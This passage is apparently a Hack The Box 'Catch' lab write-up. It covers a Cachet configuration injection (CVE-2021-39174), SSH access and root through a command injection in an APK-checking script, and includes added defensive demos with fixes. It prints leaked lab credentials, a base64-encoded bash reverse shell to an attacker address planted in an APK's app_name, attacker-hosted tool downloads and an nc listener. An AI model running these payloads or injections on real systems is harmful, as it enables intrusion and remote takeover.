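    if not sep or len(user_id) != 24 or not secret:
        raise ValueError("token is not a <user id>:<secret> pair")
    return user_id


def triage(users_json, messages_json, leaked_token):
    """Attribute the leaked token to an account and list credential disclosures in the room."""
    users = {u["id"]: u["username"] for u in json.loads(users_json)}
    owner_id = token_owner(leaked_token)
    report = {"token_account": users.get(owner_id, owner_id), "disclosures": []}
    # Oldest first, so the report reads as a timeline.
    for msg in sorted(json.loads(messages_json), key=lambda m: m["posted"]):
        if not CRED_HINTS.search(msg["text"]):
            continue
        pair = CRED_PAIR.search(msg["text"])
        report["disclosures"].append({
            "message": msg["id"],
            "by": users.get(msg["owner"], msg["owner"]),
            "posted": msg["posted"],
            # The account named in a `user : password` pair, if one was pasted.
            "account": pair.group(1) if pair else None,
        })
    return report


if __name__ == "__main__":
    print(json.dumps(triage(USERS_JSON, MESSAGES_JSON, SAMPLE_TOKEN), indent=2))
```

With the real exports, `token_account` tells you whose API token to revoke, and every disclosure with a non-empty `account` is a password that must be rotated regardless of whether the chat history is later deleted.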
7. Cachet
http://status.catch.htb:8000/dashboard
7.1 CVE-2021-39174
https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection
http://status.catch.htb:8000/dashboard/settings/mail
Test Log:
[2022-03-27 09:45:50] production.DEBUG: Message-ID: <2f0396c23b645e8f2c65c399b93a2645@status.catch.htb>
Date: Sun, 27 Mar 2022 09:45:50 +0000
Subject: Ping from Cachet!
From: Cachet <notify@10.129.136.74>
To: john@catch.htb
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="_=_swift_1648374350_a552bce8393e8e09949592d9f281dd7d_=_"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #f5f8fa; color: #74787E; height: 100%; hyphens: auto; line-height: 1.4; margin: 0; -moz-hyphens: auto; -ms-word-break: break-all; width: 100% !important; -webkit-hyphens: auto; -webkit-text-size-adjust: none; word-break: break-word;">
<style>
@media only screen and (max-width: 600px) {
.inner-body {
width: 100% !important;
}
.footer {
width: 100% !important;
}
}
@media only screen and (max-width: 500px) {
.button {
width: 100% !important;
}
}
</style>
<table class="wrapper" width="100%" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #f5f8fa; margin: 0; padding: 0; width: 100%; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 100%;"><tr>
<td align="center" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box;">
<table class="content" width="100%" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; margin: 0; padding: 0; width: 100%; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 100%;">
<tr>
<td class="header" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; padding: 25px 0; text-align: center;">
<a href="http://10.129.136.74:8001" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #bbbfc3; font-size: 19px; font-weight: bold; text-decoration: none; text-shadow: 0 1px 0 white;">
Catch Global Systems
</a>
</td>
</tr>
<!-- Email Body --><tr>
<td class="body" width="100%" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #FFFFFF; border-bottom: 1px solid #EDEFF2; border-top: 1px solid #EDEFF2; margin: 0; padding: 0; width: 100%; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 100%;">
<table class="inner-body" align="center" width="570" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #FFFFFF; margin: 0 auto; padding: 0; width: 570px; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 570px;">
<!-- Body content --><tr>
<td class="content-cell" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; padding: 35px;">
<h1 style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #2F3133; font-size: 19px; font-weight: bold; margin-top: 0; text-align: left;">🔔</h1>
<p style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #74787E; font-size: 16px; line-height: 1.5em; margin-top: 0; text-align: left;">This is a test notification from Cachet!</p>
<p style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #74787E; font-size: 16px; line-height: 1.5em; margin-top: 0; text-align: left;">Regards,<br>Catch Global Systems</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box;">
<table class="footer" align="center" width="570" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; margin: 0 auto; padding: 0; text-align: center; width: 570px; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 570px;"><tr>
<td class="content-cell" align="center" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; padding: 35px;">
<p style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; line-height: 1.5em; margin-top: 0; color: #AEAEAE; font-size: 12px; text-align: center;">© 2022 Catch Global Systems. All rights reserved.</p>
</td>
</tr></table>
</td>
</tr>
</table>
</td>
</tr></table>
</body>
</html>
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
[Catch Global Systems](http://10.129.136.74:8001)
# 🔔
This is a test notification from Cachet!
Regards,Catch Global Systems
© 2022 Catch Global Systems. All rights reserved.
${}
- In place of the "mail from server" value, a variable reference is written. Example conf:
https://docs.cachethq.io/docs/installing-cachet
Enter something like ${DB_USERNAME} as the value of the "mail from server" field, refresh the browser, and the values from the conf are displayed:
APP_ENV=production
APP_URL=http://localhost
APP_KEY=base64:9mUxJeOqzwJdByidmxhbJaa74xh3ObD79OI6oG1KgyA=
DB_DRIVER=mysql
DB_HOST=localhost
DB_DATABASE=cachet
DB_USERNAME=will
DB_PASSWORD=s2#4Fg0_%3!
will -> s2#4Fg0_%3!
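To see why a dashboard value written into .env exposes the other settings, here is an added Python model (not Cachet's or Laravel's code) of dotenv-style `${VAR}` expansion: the unsafe writer stores the submitted value verbatim, so `${DB_PASSWORD}` placed in a mail setting is resolved from the rest of the file when the configuration is loaded; the safe writer, an assumed mitigation rather than Cachet's actual patch, refuses values that contain interpolation syntax or line breaks before they reach the file. The .env contents are constructed placeholders modelled on the output above, and MAIL_HOST stands in for whichever key the "mail from server" field maps to.

```python
import re

# Constructed .env modelled on the Cachet configuration shown above; all values are placeholders.
ENV_FILE = """APP_ENV=production
APP_KEY=base64:PLACEHOLDER_APP_KEY
DB_USERNAME=will
DB_PASSWORD=placeholder-db-password
MAIL_HOST=localhost
"""

# ${NAME} references, as resolved by dotenv-style loaders.
NESTED = re.compile(r"\$\{([A-Z0-9_]+)\}")


def parse_env(text):
    """Parse KEY=VALUE lines and expand ${VAR} references against the other keys."""
    raw = {}
    for line in text.splitlines():
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        raw[key.strip()] = value.strip()
    return {k: NESTED.sub(lambda m: raw.get(m.group(1), ""), v) for k, v in raw.items()}


def replace_line(env_text, key, value):
    """Rewrite the file with KEY=value, replacing any existing line for that key."""
    lines = [l for l in env_text.splitlines() if not l.startswith(key + "=")]
    lines.append(f"{key}={value}")
    return "\n".join(lines) + "\n"


def write_setting_unsafe(env_text, key, value):
    """The vulnerable pattern: an unvalidated dashboard value goes into .env verbatim."""
    return replace_line(env_text, key, value)


def write_setting_safe(env_text, key, value):
    """Assumed mitigation: reject interpolation syntax and line breaks, then write."""
    if "${" in value or "\n" in value or "\r" in value:
        raise ValueError(f"refusing to write {key}: value contains ${{...}} or a line break")
    return replace_line(env_text, key, value)


def setting_rejected(env_text, key, value):
    """True when the safe writer refuses the value (convenience wrapper for checks)."""
    try:
        write_setting_safe(env_text, key, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    leaked = parse_env(write_setting_unsafe(ENV_FILE, "MAIL_HOST", "${DB_PASSWORD}"))
    print("unsafe writer, MAIL_HOST resolves to:", leaked["MAIL_HOST"])
    print("safe writer rejects it:", setting_rejected(ENV_FILE, "MAIL_HOST", "${DB_PASSWORD}"))
```

The model shows that the leak needs no code execution at all: once the file is loaded, whatever page renders the mail setting back to the user renders the expanded secret. Validating the field against an allowlist of hostname characters would be stricter still than the `${` check used here.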
ssh will@10.10.11.150
user.txt
8470a0******
8. Privilege escalation
uname -a
grep -cw smep /proc/cpuinfo; grep -cw smep /proc/cpuinfo
Linux catch 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
#2
#2
sudo -l
will@catch:~$ sudo -l
[sudo] password for will:
Sorry, user will may not run sudo on catch.
linpeas
#Local VM
python3 -m http.server
#Machine VM
curl http://10.10.14.71:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh # in the /tmp dir
linpeas findings:
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rwxr-x--x+ 1 root root 1894 Mar 3 14:23 /opt/mdm/verify.sh
-rw-r----- 1 root will 33 Mar 27 23:14 /home/will/user.txt
╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 2 www-data www-data 4096 Mar 3 02:28 /var/www/html/Cachet/.github
drwxr-xr-x 2 root root 4096 Jun 8 2019 /var/www/html/Cachet/vendor/doctrine/lexer/.github
drwxr-xr-x 3 root root 4096 Mar 21 2021 /var/www/html/Cachet/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 root root 4096 Dec 20 2020 /var/www/html/Cachet/vendor/nikic/php-parser/.github
drwxr-xr-x 2 root root 4096 Dec 6 2019 /var/www/html/Cachet/vendor/psy/psysh/.github
drwxr-xr-x 2 root root 4096 Mar 9 2021 /var/www/html/Cachet/vendor/swiftmailer/swiftmailer/.github
-rw-r--r-- 1 git git 162 Dec 14 08:34 /home/git/.gitconfig
drwxr-xr-x 8 www-data www-data 4096 Mar 3 02:28 /var/www/html/Cachet/.git
Checking verify.sh:
scp will@10.10.11.150:/opt/mdm/verify.sh .
```bash
#!/bin/bash
###################
# Signature Check #
###################
sig_check() {
jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
if [[ $? -eq 0 ]]; then
echo '[+] Signature Check Passed'
else
echo '[!] Signature Check Failed. Invalid Certificate.'
cleanup
exit
fi
}
#######################
# Compatibility Check #
#######################
comp_check() {
apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
if [ -z "$COMPILE_SDK_VER" ]; then
echo '[!] Failed to find target SDK version.'
cleanup
exit
else
if [ $COMPILE_SDK_VER -lt 18 ]; then
echo "[!] APK Doesn't meet the requirements"
cleanup
exit
fi
fi
}
####################
# Basic App Checks #
####################
app_check() {
APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
echo $APP_NAME
if [[ $APP_NAME == *"Catch"* ]]; then
echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
else
echo "[!] App doesn't belong to Catch Global"
cleanup
exit
fi
}
###########
# Cleanup #
###########
cleanup() {
rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}
###################
# MDM CheckerV1.0 #
###################
DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin
for IN_APK_NAME in $DROPBOX/*.apk;do
OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
APK_NAME="$(openssl rand -hex 12).apk"
if [[ -L "$IN_APK_NAME" ]]; then
exit
else
mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
fi
sig_check $IN_FOLDER $APK_NAME
comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup
```
Explanation
2>/dev/null >/dev/null
- both stderr and stdout are redirected to /dev/null, a special file that discards anything written to it; nothing the tool prints is shown, only its exit status is used.
0 means stdin
1 means stdout (useful output)
2 means stderr (error messages)
pspy output
/var/www/html/Cachet/.env
/usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6015 -container-ip 172.17.0.17 -container-port 80
/usr/local/bin/gitea web --config /etc/gitea/app.ini
/var/www/html/Cachet/.env:
DB_DRIVER=mysql
DB_HOST=localhost
DB_UNIX_SOCKET=null
DB_DATABASE=cachet
DB_USERNAME=homestead
DB_PASSWORD=secret
DB_PORT=null
DB_PREFIX=null
app_check()
```bash
####################
# Basic App Checks #
####################
app_check() {
APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
echo $APP_NAME
if [[ $APP_NAME == *"Catch"* ]]; then
echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
else
echo "[!] App doesn't belong to Catch Global"
cleanup
exit
fi
}
```
/res/values/strings.xml
- the script reads the app_name string from the decoded app here, and that value is handed to `sh -c` through xargs without any sanitisation.
The payload to run on the target is a bash reverse shell (the base64 string below decodes to exactly this line):
```bash
/bin/bash -i >& /dev/tcp/10.10.14.121/9001 0>&1
```
Edit /res/values/strings.xml in the decoded APK:
```xml
......
<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEyMS85MDAxIDA+JjE= | base64 -d | bash</string>
......
```
Why this works: the name still contains "Catch", so the `*"Catch"*` check passes; `echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'` then runs `sh -c 'mkdir Catch|echo ... | base64 -d | bash'`, and the `|` turns it into a pipeline that decodes and executes the payload with the privileges of verify.sh (root). Base64 keeps characters such as `&` and `>` out of the XML and the command line, so neither the XML parser nor the `[^<]+` capture in grep trips over them. Then rebuild the APK.
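To make the app_check() flaw concrete without a target, the following added example (not part of the original writeup or of verify.sh) reproduces the vulnerable `xargs -I {} sh -c 'mkdir {}'` line in a throwaway directory and puts a fixed version beside it. The function names, the `touch pwned` stand-in for the reverse shell and the marker file are assumptions made for the demo.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup or of verify.sh: it
# reproduces the app_check() injection in a throwaway directory and shows a
# fixed version beside it. Function names, the payload and the marker file
# "pwned" are ours.

# Vulnerable pattern, as in verify.sh: the app_name string reaches `sh -c`
# via xargs -I, so shell metacharacters inside it are parsed and executed.
vuln_mkdir() {
  echo -n "$1" | xargs -I {} sh -c 'mkdir {}'
}

# Fixed pattern: never let untrusted data reach a shell parser. Allow-list
# the characters first, then pass the name as one argument to mkdir.
safe_mkdir() {
  case "$1" in
    *[!A-Za-z0-9._-]*) echo "[!] rejected app_name: $1" >&2; return 1 ;;
    '') echo "[!] empty app_name" >&2; return 1 ;;
  esac
  mkdir -- "$1"
}

# Runs one variant ($1 = vuln|safe) with app_name $2 in a fresh temp dir and
# returns what happened: injected (the payload ran), created (a directory
# with the literal name was made) or rejected (nothing was created).
demo() {
  local work result
  work=$(mktemp -d)
  ( cd "$work" && "${1}_mkdir" "$2" ) 2>/dev/null || true
  if [ -e "$work/pwned" ]; then
    result=injected
  elif [ -d "$work/$2" ]; then
    result=created
  else
    result=rejected
  fi
  rm -rf "$work"
  echo "$result"
}

# Stand-alone run: mirrors the strings.xml trick, with `touch pwned` as a
# harmless stand-in for the base64-encoded reverse shell.
echo "vuln : $(demo vuln 'Catch|touch pwned')"
echo "safe : $(demo safe 'Catch|touch pwned')"
echo "safe : $(demo safe 'CatchMail')"
```

The vulnerable variant creates the marker file, which is exactly what happens on the box when root's verify.sh processes the rebuilt APK; the fixed variant refuses the same string and only creates directories for names that survive the allow-list.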
apktool b -f -d /home/va4mi/Documents/htb/machine/Catch/apk/catchv1.0 -o /home/va4mi/Documents/htb/machine/Catch/apk/catchv2.apk
I: Using Apktool 2.6.1
I: Smaling smali folder into classes.dex...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
sign apk (a fresh self-signed key is enough: jarsigner -verify exits 0 whenever the signature is intact, so sig_check only proves the file was not modified after signing, not who signed it):
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore catchv2.apk alias_name
jarsigner -verify -verbose -certs catchv2.apk
Copy the built and signed APK into /opt/mdm/apk_bin on the target (served from the attacker box with python3 -m http.server; the first wget below points at the wrong host and fails):
will@catch:/tmp$ wget http://10.10.11.150:8000/catchv2.apk
--2022-04-09 16:35:33-- http://10.10.11.150:8000/catchv2.apk
Connecting to 10.10.11.150:8000... failed: Connection refused.
will@catch:/tmp$ wget http://10.10.14.121:8000/catchv2.apk
--2022-04-09 16:36:18-- http://10.10.14.121:8000/catchv2.apk
Connecting to 10.10.14.121:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2821187 (2.7M) [application/vnd.android.package-archive]
Saving to: ‘catchv2.apk’
catchv2.apk 100%[=================================================================================>] 2.69M 679KB/s in 4.1s
2022-04-09 16:36:23 (679 KB/s) - ‘catchv2.apk’ saved [2821187/2821187]
will@catch:/tmp$ cp catchv2.apk /opt/mdm/apk_bin
will@catch:/tmp$ ls /opt/mdm/apk_bin
catchv2.apk
root
└╼va4mi$nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.121] from (UNKNOWN) [10.10.11.150] 33190
bash: cannot set terminal process group (807862): Inappropriate ioctl for device
bash: no job control in this shell
root@catch:~# ls
ls
Catch
lets-chat
mdm
reset.sh
root.txt
run.sh
root@catch:~# cat root.txt
cat root.txt
8833e6************